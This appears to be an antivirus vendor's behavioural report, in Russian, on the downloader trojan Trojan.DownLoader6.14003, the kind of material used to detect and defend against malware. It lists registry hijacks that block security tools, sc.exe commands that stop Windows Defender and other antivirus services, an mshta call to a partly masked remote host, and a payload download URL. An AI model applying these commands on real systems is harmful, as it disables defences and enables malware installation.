Trojan.DownLoader6.14003

Техническая информация

Для обеспечения автозапуска и распространения:

Модифицирует следующие ключи реестра:

[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcsysmon.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mctool.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshield.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcproxy.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McSACore.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshell.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ackwin32.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcnasvc.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luau.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe] 'Debugger' = 'svchost.exe'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Inspector' = '%APPDATA%\Protector-hmoc.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\virusutilities.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxkickoff.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lucomserver.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcagent.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcmnhdlr.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcmscsvc.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mapisvc32.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luinit.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luspt.exe] 'Debugger' = 'svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MalwareRemoval.exe] 'Debugger' = 'svchost.exe'

Вредоносные функции:

Создает и запускает на исполнение:

%APPDATA%\npswf32.tmp
%APPDATA%\Protector-hmoc.exe
%APPDATA%\npswf32.tmp (загружен из сети Интернет)

Запускает на исполнение:

<SYSTEM32>\sc.exe config AntiVirService start= disabled
<SYSTEM32>\sc.exe stop AntiVirService
<SYSTEM32>\sc.exe config AntiVirSchedulerService start= disabled
<SYSTEM32>\sc.exe config GuardX start= disabled
<SYSTEM32>\sc.exe stop GuardX
<SYSTEM32>\sc.exe config ekrn start= disabled
<SYSTEM32>\sc.exe stop WinDefend
<SYSTEM32>\mshta.exe "http://ga#####.statonlinekit.in/?0=##########################################################################################"
<SYSTEM32>\sc.exe config WinDefend start= disabled
<SYSTEM32>\sc.exe config msmpsvc start= disabled
<SYSTEM32>\sc.exe stop msmpsvc

Изменения в файловой системе:

Создает следующие файлы:

%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\QQE5TY[1].7z
%APPDATA%\npswf32.tmp
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\galaint.statonlinekit[1].2180&9=1058&10=480&11=1111&12=ojibljnxam&14=0
%APPDATA%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#local\settings.sol
<SYSTEM32>\d3d9caps.dat
%APPDATA%\Protector-hmoc.exe
<SYSTEM32>\d3d9caps.tmp

Удаляет следующие файлы:

%APPDATA%\npswf32.tmp
<SYSTEM32>\d3d9caps.dat

Самоудаляется.

Сетевая активность:

Подключается к:

'localhost':1039
'ga#####.statonlinekit.in':80
'localhost':1036
'dl.##opbox.com':80

TCP:

Запросы HTTP GET:

ga#####.statonlinekit.in/?0=##########################################################################################
dl.##opbox.com/u/78644301/QQE5TY.7z

UDP: